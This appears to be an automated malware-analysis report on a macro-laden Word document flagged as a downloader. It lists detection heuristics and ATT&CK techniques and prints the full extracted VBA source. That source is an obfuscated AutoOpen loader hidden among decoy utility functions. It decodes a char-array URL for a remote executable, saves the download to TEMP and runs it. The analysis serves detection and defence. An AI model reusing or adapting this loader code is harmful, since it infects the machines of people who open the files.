Verdict: MALICIOUS
Risk Score: 330

Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1140 Deobfuscate or Obfuscate Malicious Code
The sample is an OOXML document containing obfuscated VBA macros, indicated by multiple critical heuristic firings including 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The presence of an 'AutoOpen' macro suggests automatic execution upon opening. ClamAV detection further confirms its malicious nature as a downloader. The VBA code appears to be designed to deobfuscate and execute a payload, likely from a remote source.
Heuristics (8)

- ClamAV: Doc.Downloader.Bendis-6680540-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Bendis-6680540-0.
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings). Document contains a VBA project — VBA macros present.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER). Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set fishkinet_1 = CreateObject(hubabuba(0))`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set fishkinet_1 = CreateObject(hubabuba(0))`
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched line in script: `rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub autoopen()`
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OOXML body / shared strings); they are the standard OOXML and Word schema namespace URIs that any .docx declares in its XML parts, not hosts reached by the macro:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15726 bytes | dbfac44189f0d53c65a5f053e7fe1de90de0c9d8ec794354c2930702317975af |

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Call CenterByMan
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{35466B9E-7009-4369-8133-743D2ECA3E53}{4808849B-1BF1-4489-A3DF-A05159FFCE8E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public fishkinet_1 As Object
Public fishkinet_2 As Object
Public fishkinet_3 As Object
Public fishkinet_7() As String
Public fishkinet_4 As String
Public fishkinet_5 As String
Public fishkinet_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set fishkinet_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName fishkinet_2, hubabuba(9), VbMethod, rbp
CallByName fishkinet_2, hubabuba(11), VbMethod, fishkinet_5, 2
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
fishkinet_6.Open (fishkinet_5)
End Sub
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
fishkinet_5 = fishkinet_4
GoTo LABZ4
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
fishkinet_5 = fishkinet_5 + hubabuba(12)
Exit Function
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
Public Sub OnasOn()
CallByName fishkinet_2, hubabuba(7), VbLet, 1
fishkinet_2.Open
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
Public Function reduceRngVertical(ByVal sign As String) As Variant
Dim k
Dim i
Dim tmpCnt As Integer
tmpCnt = 1
Dim arr()
Dim u As Integer
Dim l As Integer
For Each k In pDict.Keys
If tmpCnt = 1 Then
u = UBound(pDict(k))
l = LBound(pDict(k))
ReDim arr(l To u)
tmpCnt = 2
If sign = "+" Then
For i = l To u
arr(i) = 0
Next i
Else
For i = l To u
arr(i) = 1
Next i
End If
End If
If sign = "+" Then
For i = l To u
arr(i) = arr(i) + pDict(k)(i)
Next i
Else
For i = l To u
arr(i) = arr(i) * pDict(k)(i)
Next i
End If
Next k
reduceRngVertical = arr
End Function
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
Dim res As Variant
Dim k
If sign = "" Or sign = "+" Then
res = 0
For Each k In arr
res = res + k
Next k
ElseIf sign = "*" Then
res = 1
For Each k In arr
res = res * k
Next k
End If
reduceArray = res
End Function
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
res.dict(k) = k
End If
Next k
Else
For Each k In pDict.Keys
If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
res.dict(k) = k
End If
Next k
End If
Set filterVal = res
End Function
Public Sub KeepBlyading()
fishkinet_1.Send
GoTo SIDR4
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
fishkinet_4 = fishkinet_3(hubabuba(6))
GoTo SIDR1
SIDR1:
product
OnasOn
End Sub
Public Function filterExklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If Not reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterExklude = res
End Function
Attribute VB_Name = "Module3"
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
Dim k
Dim i
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
res.dict(k) = productArr(pDict(k), operation, operand2)
Next k
Else
For Each k In pDict.Keys
If operand2.dict.Exists(k) Then
res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
End If
Next k
End If
Set productRng = res
End Function
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
Dim res
Dim i
ReDim res(LBound(arr1) To UBound(arr1))
If IsNumeric(arr2) Then
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
Next i
Else
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
Next i
End If
productArr = res
End Function
Public Function crentips(nY As Integer) As String
Dim fishkinet_8 As Integer
Dim fishkinet3_1 As String
fishkinet3_1 = ""
GoTo s2
s2:
For fishkinet_8 = LBound(fishkinet_7) To UBound(fishkinet_7)
fishkinet3_1 = fishkinet3_1 & Chr(CInt(fishkinet_7(fishkinet_8)) - 1000)
Next fishkinet_8
GoTo SIDR4
SIDR4:
fishkinet_1.Open hubabuba(5), fishkinet3_1, False
KeepBlyading
End Function
'''''''''''''''''''
'@param operation is the string to be converted, placeholder is {*} by default
'
'''''''''''''''''''
Public Function productX(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, tmp))
Next k
Else
For Each k In pDict.Keys
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, pDict(k) & ""))
Next k
End If
Set productX = res
End Function
Public Function clone() As Variant
Dim res As Variant
Set res = clone__(Me, pLevel)
With res
.appendMode = pIsDictFilled
.reversedMode = pReversedMode
If pStrictMode Then
.strictMode = True
.strictModeReg = pStrictModeReg
End If
End With
Set clone = res
End Function
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
Dim res As New Dicts
Dim k
Call res.ini
If l > 1 Then
For Each k In d.dict.Keys
Set res.dict(k) = clone__(d.dict(k), l - 1)
Next k
Else
For Each k In d.dict.Keys
res.dict(k) = d.dict(k)
Next k
End If
Set clone__ = res
End Function
Public Sub CheckBins()
fishkinet_7 = Split("1104|1116|1116|1112|1058|1047|1047|1115|1107|1114|1111|1112|1111|1116|1111|1118|1046|1114|1117|1047|1115|1121|1115|1116|1101|1109|1047|1108|1111|1103|1115|1047|1056|1055|1104|1055|1053|1052|1046|1101|1120|1101", _
"|")
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set fishkinet_2 = CreateObject(hubabuba(1))
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set fishkinet_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set fishkinet_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
Public Function filterInklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterInklude = res
End Function
''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''
Public Function constDict(Optional ByVal constant As Variant) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsMissing(constant) Then
constant = 1
End If
For Each k In pDict.Keys
res.dict(k) = constant
Next k
Set constDict = res
End Function
Attribute VB_Name = "Module4"
Public Function IsReg(testObj As Object) As Boolean
On Error GoTo errhandler3
Dim a As Boolean
a = testObj.test("")
errhandler3:
If Err.Number = 0 Then
IsReg = True
Else
IsReg = False
End If
End Function
Public Function toJSON(Optional ByVal k As String = "root") As String
Dim res As String
res = "{""name"":""" & k & """," & Chr(13)
res = res & """children"":[" & Chr(13)
Dim ky
For Each ky In pDict.Keys
res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
Next ky
toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
End Function
' ________________________________________Util Functions____________________________________________
Public Function reg(ByVal pattern As String, Optional ByVal flag As String) As Object
Dim obj As Object
Set obj = CreateObject("vbscript.regexp")
obj.pattern = pattern
If IsMissing(flag) Then
obj.IgnoreCase = True
Else
' "gi"
If InStr(StrConv(flag, vbLowerCase), "g") > 0 Then
obj.Global = True
End If
' i by default to true
If InStr(StrConv(flag, vbLowerCase), "i") > 0 Then
obj.IgnoreCase = False
End If
End If
Set reg = obj
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 62464 bytes | 1f0e56e394d5824386234d08f8d0193e86b5e7dc68873c5e35b95e4ebf510105 |

Detection (vbaProject_00.bin):
- ClamAV: Doc.Downloader.Bendis-6680540-0
- Obfuscation or payload: unlikely